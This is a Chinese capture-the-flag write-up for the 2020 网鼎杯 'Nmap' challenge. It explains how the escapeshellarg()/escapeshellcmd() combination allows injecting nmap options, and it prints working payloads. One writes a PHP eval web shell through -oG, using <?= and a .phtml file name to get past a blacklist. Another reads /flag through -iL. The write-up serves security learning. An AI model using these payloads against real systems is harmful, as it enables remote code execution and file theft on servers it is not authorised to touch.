[网鼎杯 2020 朱雀组]Nmap
[网鼎杯 2020 朱雀组]Nmap
考点
Nmap使用
escapeshellarg()+escapeshellcmd() 之殇
文件上传bypass
phtml
绕过php黑名单<?=
绕过php黑名单
wp
抓包可以看到请求的内容为host=127.0.0.1
,没有其他东西。
传入
127.0.0.1' -o xxxx
,提示hostname是127.0.0.1\
,访问xxxx无结果传入
127.0.0.1 -o xxxx'
提示hostname是127.0.0.1 -o xxxx\'
,访问xxxx无结果传入
'127.0.0.1 -o xxxx '
,提示Host maybe down
访问xxxx,发现语句如下
nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/47cae -o xxxx \127.0.0.1 \\
这就和[BUUCTF 2018]Online Tool一样,那传入127.0.0.1' -o xxxx
,应该访问xxxx'
使用同样的payload,提示Hacker...
'<?php eval($_POST["a"]);?> -oG shell.php '
测试发现过滤了php,<?php
可以使用<?=
绕过,写入的shell文件后缀可以使用phtml
绕过
'<?=eval($_POST[1]);?> -oG shell.phtml '
蚁剑连接或者直接连接即可。
在Nmap中还有一个参数-iL
是从文件中加载URL,也就是说,可以利用这一点进行文件读取
127.0.0.1' -iL /flag -o xxxx

小结
最后更新于